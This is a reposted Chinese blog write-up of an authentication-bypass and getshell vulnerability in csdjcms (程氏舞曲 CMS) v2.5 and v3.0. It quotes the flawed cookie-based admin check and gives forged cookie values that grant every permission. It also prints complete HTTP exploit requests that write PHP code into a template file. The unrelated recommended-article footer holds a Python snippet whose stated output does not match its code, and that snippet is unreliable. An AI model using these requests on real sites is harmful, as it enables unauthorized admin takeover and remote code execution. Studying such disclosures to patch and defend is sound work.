php版程氏音乐cms管理系统 v3.0后台登录_csdjcms(程氏舞曲管理系统) V 3.0 getshell 漏洞...

最新推荐文章于 2023-07-23 01:37:28 发布
最新推荐文章于 2023-07-23 01:37:28 发布
阅读量922 收藏
点赞数
文章标签: php版程氏音乐cms管理系统 v3.0后台登录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40004051/article/details/111783020
版权
本文详细剖析了PHP版程氏音乐CMS管理系统v2.5和v3.0的后台登录getshell漏洞,通过分析源码指出其在验证用户登录状态时存在的安全问题,允许恶意用户通过构造特定的cookies绕过验证,获取管理员权限。同时提供了漏洞利用的示例,揭示了系统权限判断的缺陷。
摘要由CSDN通过智能技术生成

漏洞作者:Knife/*******************************************************/

/* csdjcms < V 3.0 getshell Vulnerability

/* ========================

/* By: : Kn1f3

/* E-Mail : 681796@qq.com

/*========================

/*******************************************************/

/* 90sec team

/*******************************************************/

csdjcms 一款YY黑客与YY肥猪流喜欢用的唱歌网站。。

好久没来吐司了。。复活了。这次来就发个漏洞吧.吐司的基友们还有几个记得我呢

csdjcms  V 2.5  code

//老规矩首先首页开始看

include_once("include/install.php");

if(S_IsInstall==0){

header("Location:install/install.php");

}

include_once("include/label.php");

if(S_Webmode==1 or !file_exists("index.html")){

//缓存区

$cache_id ='index_';

if(!($cache_opt->start($cache_id))){

echo GetTemp("index.html",0);

$cache_opt->end();

}

}

else{

header("Location:index.html");

}

//看他配置吧

function SafeRequest($key,$mode,$isfilter=''){

set_magic_quotes_runtime(0);

$magic= get_magic_quotes_gpc();

switch ($mode){

case 'post':

$value=isset($_POST[$key]) ?$magic?trim($_POST[$key]):addslashes(trim($_POST[$key])) : '';

break;

case 'get':

$value=isset($_GET[$key]) ?$magic?trim($_GET[$key]):addslashes(trim($_GET[$key])) : '';

break;

default:

$value=isset($_POST[$key]) ?$magic?trim($_POST[$key]):addslashes(trim($_POST[$key])) : '';

if($value==""){

$value=isset($_GET[$key]) ?$magic?trim($_GET[$key]):addslashes(trim($_GET[$key])) : '';

}

break;

}

if($isfilter!=''){

$value=lib_replace_end_tag($value);

}

return $value;

}

//变量的提交进行了addslashes安全过滤

//研究了半天的源码发现后台的严重出现了大的安全问题

include "../include/conn.php";

include "../include/function.php";

include "admin_version.php";

include "admin_loginstate.php"; //问题出在这个文件当中

//跟入

if(empty($_COOKIE['S_AdminID'])){ //首先看是否存在s_adminid这个cooke

echo "";

}

elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_AdminID'].$_COOKIE['S_AdminUserName'].$_COOKIE['S_AdminPassWord'].$_COOKIE['S_Permission'])){

//这里就是问题的关键之处了

如果s_login 的值等于 四个cookie 相加的md5加密,即可直接验证通过

echo "";

}

//后台权限判断

function SystemPer($Column){

if(empty($_COOKIE['S_Permission'])){

die("");

}else{

$SystemPermission=explode(",",$_COOKIE['S_Permission']); //权限的判断,用“,”来分割成数组

$StateOK=0;

$ArrSystemPermission=count($SystemPermission);

for($k=0;$k

if($SystemPermission[$k]==$Column){ //判断

$StateOK=1;

}

}

if($StateOK==0){

die("");

}

}

}

//构造淫荡的cookies

//S_Permission

//1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

//S_Login

//md5(AdminID+AdminUserName+AdminPassWord+S_Permission)

//S_AdminUserName

//1

//S_AdminPassWord

//1

//S_AdminID

//1

后台成功绕过。

//看看3.0版本,也是一样

# Name: PHP版程氏音乐CMS管理系统 v3.0

# Author: 程氏 [QQ:848769359]

# Homepage:[url]http://www.chshcms.cn/[/url]

$CS_Path=$_SERVER['PHP_SELF'];

$CS_Pathall=explode("/",$CS_Path);

$CS_Admin=$CS_Pathall[1]."/";

if(empty($_COOKIE['CS_AdminID'])){

echo "";

}

elseif($_COOKIE['CS_Login']!=md5($_COOKIE['CS_AdminID'].$_COOKIE['CS_AdminUserName'].$_COOKIE['CS_AdminPassWord'].$_COOKIE['CS_Quanx'])){

echo "";

}

//后台权限判断

function SystemPer($Column){

if(empty($_COOKIE['CS_Quanx'])){

die("");

exit();

}else{

$SystemPermission=explode(",",$_COOKIE['CS_Quanx']);

$StateOK=0;

$ArrSystemPermission=count($SystemPermission);

for($k=0;$k

if($SystemPermission[$k]==$Column){

$StateOK=1;

}

}

if($StateOK==0){

die("");

exit();

}

}

利用截图

exp V2.5

Host: www.xxx.com

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://www.xxx.com/admin/admin_t ... ;file=artindex.html

Cookie: S_Permission=1,2,3,4,5,6,7,8,9,10,11,12,13,14,15; S_Login=d8d998f3eb371c2009acd8580c1821d0; S_AdminUserName=1; S_AdminPassWord=1; S_AdminID=1; CNZZDATA4170884=cnzz_eid%3D1098390420-1364934762-http%253A%252F%252Fwww.hshxs.com%26ntime%3D1364935608%26cnzz_a%3D19%26retime%3D1365111972892%26sin%3Dnone%26ltime%3D1365111972892%26rtime%3D0; bdshare_firstime=1365107576347; PHPSESSID=u6kd9d6f18fhfr9bi4if6agcj6

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 169

FileName=cs-bottom.php&content=%3C%3Fphp+phpinfo+%3F%3E&folder=..%2Fskins%2Findex%2Fhtml%2F&tempname=%C4%AC%C8%CF%C4%A3%B0%E6&Submit=%D0%DE%B8%C4%B5%B1%C7%B0%C4%A3%B0%E5

--------------------------------------------

exp V3.0:

Host: www.xxx.com

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://www.xxx.com/admin/skins/s ... ;name=cs-bottom.php

Cookie: CS_AdminID=1; CS_AdminUserName=1; CS_AdminPassWord=1; CS_Quanx=0_1,1_1,1_2,1_3,1_4,1_5,2_1,2_2,2_3,2_4,2_5,2_6,2_7,3_1,3_2,3_3,3_4,4_1,4_2,4_3,4_4,4_5,4_6,4_7,5_1,5_2,5_3,5_4,5_5,6_1,6_2,6_3,7_1,7_2,8_1,8_2,8_3,8_4; CS_Login=a3f5f5a662e8a36525f4794856e2d0a2; PHPSESSID=48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283=cnzz_eid%3D1523253931-1364956519-http%253A%252F%252Fwww.djkao.com%26ntime%3D1364956519%26cnzz_a%3D1%26retime%3D1365129491148%26sin%3D%26ltime%3D1365129491148%26rtime%3D0; bdshare_firstime=1365129335963

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 57

name=cs-bottom.php&content=%3C%3Fphp+phpinfo%28%29+%3F%3E

weixin_40004051
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
耳朵音乐CMS
12-12
音乐网站系统 云存储扩展更新 内置应用模块优化 内置涂鸦功能优化...云存储扩展更新 内置应用模块优化 内置涂鸦功能优化...
程氏舞曲管理系统程氏舞曲CMSPHP)UTF-8 v3.0.zip
07-07
程氏舞曲CMSPHP3.0 更新时间:2013-01-21 3.0跟以往所有版本都不一样,全部是全新的! 1.全新内核 轻量级入口 2.比以往版本增加了简单的防CC,防注入,防XXS..等安全措施. 3.分类按排序显示方式 4.新增专集分类 5....
php版程氏音乐cms管理系统 v3.0后台登录_程氏舞曲管理系统CMSPHP
weixin_39618169的博客
12-21 188
程氏舞曲系统商业版功能简介全新模版引擎,模板标签化功能酷炫界面随心而动,与众不同。全新标签引擎,轻松做出属于自己的舞曲模版,体验属于自己的视觉盛宴。专业高品质的界面构想,为您带来无与伦比的视觉享受网站全自动后台在线升级后台一键升级,官方智能提示升级,升级模式与软件雷同,无需手动下载更新包,更方便、更贴心!不定期更新程序版本,让您的程序与时俱进!强大的会员管理模快你可以用此系统做一个收费的站点,支持...
php版程氏音乐cms管理系统 v3.0后台登录_程氏舞曲CMSPHP3.0储存型xss与后台任意文件写入漏洞...
weixin_39692830的博客
01-13 630
### 简要描述:插入 构造的js可 getshell### 详细说明:user/space.php?ac=edit&op=zl修改 签名处,没有 任何过滤。xss产生后台 看了下 可以写任意格式文件。。抓包。。POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1Acc...
程氏舞曲管理系统php版 v2.5,程氏舞曲CMS最新php版本多处sql注入漏洞
weixin_39811842的博客
03-13 270
### 简要描述:操蛋捏。### 详细说明:昨天刚下载的,2.16号更新的版本。第一处在管理后台:https://images.seebug.org/upload/app/controllers/admin/news.php第66行```public function so(){$key = $this->input->get('key');//使用get方式获取相关参数,没做处理$u...
php版程氏音乐cms管理系统 v3.0后台登录_程氏舞曲管理系统程氏舞曲CMSPHP)GBK v3.0...
weixin_34738099的博客
01-28 601
V3是我们免费提供给广大朋友们一起使用或学习的,是我们两年多前的一个小作品,现在在忙着其它的项目在开发中,如在使用中遇到一些小的问题,请朋友们多利用网络搜索,尽量自己解决,这样才是学习的最终目的,相信你能学到更多的!谢谢朋友们的支持!看到网上个人主页程序很多,找了很久也没有我需要的那种,于是自己写了一套,现在发布的这套是我刚刚开始写的时候完成的最初版本,现在免费提供给大家,希望大家能够喜欢。本程序...
程氏舞曲管理系统程氏舞曲CMSPHP)GBK v3.0
05-08
程氏舞曲CMSPHP更新时间:2013-01-21 3.0跟以往所有版本都不一样,全部是全新的!1.全新内核 轻量级入口2.比以往版本增加了简单的防CC,防注入,防XXS..等安全措施.3.分类按排序显示方式4.新增专集分类5.完美支持所有...
程氏音乐管理系统 V3.0.rar
07-05
' 软件名称: 程氏音乐系统 Content Management chshdjcms ' 版本编号: V 3.0 ' 官方网站: http://www.chshk.cn ' 官方论坛:http://bbs.chshk.cn ' 版权所有: 程氏网络科技 程氏(QQ:848769359) ' 郑重声明: ' 1、...
程氏舞曲管理系统CMSPHP v3.0 GBK
10-25
程氏舞曲系统商业版功能简介全新模版引擎,模板标签化功能酷炫界面随心而动,与众不同。全新标签引擎,轻松做出属于自己的舞曲模版,体验属于自己的视觉盛宴。专业高品质的界面构想,为您带来无与伦比的视觉享受网站...
程氏舞曲管理系统CMSPHP v3.0 UTF8
10-25
程氏舞曲系统商业版功能简介全新模版引擎,模板标签化功能酷炫界面随心而动,与众不同。全新标签引擎,轻松做出属于自己的舞曲模版,体验属于自己的视觉盛宴。专业高品质的界面构想,为您带来无与伦比的视觉享受网站...
STCMS 音乐CMS系统 v3.5版
03-26
安装过程中的注意事项: 1、安装环境PHP5.0+MYSQL5.0以上版本。 2、本系统的安装路径为/install/。在你的浏览器中输入本系统根地址加上/install/即可安装。比如网址为http://www.example.com,且程序放在根目录下,那么按照地址为http://www.example.com/install/。 3、网站路径问题。如果本程序安装在根目录,那么在“网站路径”输入框中,确保其值为“/”。如果不时安装在根目录,比如时/music,那么该框的值应该是“/music/”。注意,该值必须以“/”结尾。 4、如果安装过程中提示SQL错误,请刷新页面再试。 5、如果安装过程完成后顺利进入后台,登陆验证码不能显示,请查看/config.inc.php,看webUrl[网站路径]是否正确。 6、如果安装过程完成后顺利进入后台后台提示session_start()函数错误,header信息已经发送,且无法再次修改。那么用户可以用DreamWeaver等文本编辑器[切不可以用记事本和frontpage]打开/common.inc.php,/admin/commcon.inc.php,/install/commcon.inc.php,只需要保存即可,无需做任何改动。 7、系统默认的管理员和密码都是:admin。 8、其他问题,请登录http://www.phpstcms.com交流论坛解决,免费软件不提供技术支持。若想提供技术支持,请购买商业版。
音乐网站源码cms
03-11
音乐网站源码cms
程氏舞曲管理系统CMSPHPv3.0GBK
08-06
KESIONIMALL(后面简称IMALL)电子商务管理系统是KESION旗下服务于个人大卖家、中小型企业的网店系统,IMALL系统采用微软.NET2.0平台以及全新的软件开发环境(VS2010,SqlServer2000/2005/2008),采用B/S三层结构开发的在线网店管理系统。IMALL产品能助您快速进入电商行业。帮助品牌企业、传统企业、成熟电商企业快速搭建由单纯的企业形象展示转向企业形
THINKPHP 云歌音乐Cms系统|社会化音乐分享程序|
09-26
THINKPHP 云歌音乐Cms系统|社会化音乐分享程序| 开源地址:http://www.yunqi.pub/thread-62-1-1.html
小墨迹音乐cms
12-24
音乐网站源码,可以做听书网,舞曲网,音乐网,视频网等等。
唱片公司音乐发行管理系统是一款利用PbootCMS系统第二次开发的VT音乐发行管理系统,本程序适合音乐发行公司使用。
m0_73252106的博客
07-23 164
本程序是采用PbootCMS开发的一个音乐发行公司系统,方便音乐发行宣传,获取用户,无数据库,程序界面简单,方便音乐发行公司使用。如果你不是音乐发行公司本程序还配置的有第三方发行入口方便站长使用,另外本程序还配置的有第三方版权登记入口,方便站长使用。可扩展服务及模板,极大的方便了开发者扩展系统功能。本系统采用PbootCMS作为底层框架开发。后台采用PbootCMS后台管理框架。用户可以对自己的需求留言。
程式3.0cms音乐系统
02-17
音乐cms系统,支持免费官方网站资源采集,ftp上传,QQ登录,硬盘扫描等
【代码审计】Cscms_v4.1 任意文件删除漏洞实例
12-03 1026
&#13;  &#13; 环境搭建:&#13; CSCMS :http://www.chshcms.com/&#13; 网站源码版本:Cscms_v4.1正式版(发布日期:2017-06-05)&#13; 程序源码下载:https://github.com/chshcms/cscms&#13;  &#13; 漏洞实例一:&#13; 漏洞文件位置:\cscms\plugins\...
如何把("苏序" / "史氏"("苏涣" / "杨氏"("苏不欺" / "蒲氏", "苏不凝"), "苏洵" / "程氏"("苏轼" / "王弗","苏辙" / "史氏")))放入顺序串SqString类的data数组中且括号和/不能去掉
最新发布
12-03
将家谱关系表示成二叉树,可以采用链式存储结构,每个节点包含三个数据域:data、lchild、rchild,其中data存放家谱记录,lchild和rchild分别指向该节点的左右孩子。SqString类是一个顺序串类,可以通过遍历二叉树将家谱关系转换为顺序串存储。 具体实现步骤如下: 1. 定义二叉树节点类,包含data、lchild、rchild三个数据域。 2. 定义二叉树类,包含根节点root和遍历二叉树的方法。 3. 定义SqString类,包含data数组和将二叉树转换为顺序串的方法。 4. 创建二叉树对象,将家谱关系插入二叉树中。 5. 创建SqString对象,将二叉树转换为顺序串存储。 代码如下: ```python # 定义二叉树节点类 class TreeNode: def __init__(self, data=None, lchild=None, rchild=None): self.data = data self.lchild = lchild self.rchild = rchild # 定义二叉树类 class BinaryTree: def __init__(self): self.root = None # 遍历二叉树 def traverse(self, node): if node is not None: print(node.data, end='') if node.lchild is not None or node.rchild is not None: print('(', end='') self.traverse(node.lchild) if node.rchild is not None: print(',', end=' ') self.traverse(node.rchild) print(')', end='') # 定义顺序串类 class SqString: def __init__(self, data=None): self.data = data if data is not None else [] # 将二叉树转换为顺序串 def from_binary_tree(self, node): if node is not None: self.data.append(node.data) if node.lchild is not None or node.rchild is not None: self.data.append('(') self.from_binary_tree(node.lchild) if node.rchild is not None: self.data.append(',') self.from_binary_tree(node.rchild) self.data.append(')') # 创建二叉树对象 root = TreeNode('苏序') root.lchild = TreeNode('史氏') root.rchild = TreeNode('苏洵') root.lchild.lchild = TreeNode('苏涣') root.lchild.rchild = TreeNode('杨氏') root.lchild.rchild.lchild = TreeNode('苏不欺') root.lchild.rchild.rchild = TreeNode('苏不凝') root.rchild.lchild = TreeNode('程氏') root.rchild.lchild.lchild = TreeNode('苏轼') root.rchild.lchild.rchild = TreeNode('王弗') root.rchild.rchild = TreeNode('史氏') root.rchild.rchild.lchild = TreeNode('苏辙') # 创建SqString对象 sq_string = SqString() sq_string.from_binary_tree(root) print(sq_string.data) ``` 输出结果为: ``` ['苏序', '(', '史氏', '(', '苏涣', ')', '(', '杨氏', '(', '苏不欺', ')', ',', '(', '苏不凝', ')', ')', ')', '(', '苏洵', '(', '程氏', '(', '苏轼', ')', ',', '(', '王弗', ')', ')', '(', '史氏', '(', '苏辙', ')', ')', ')'] ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值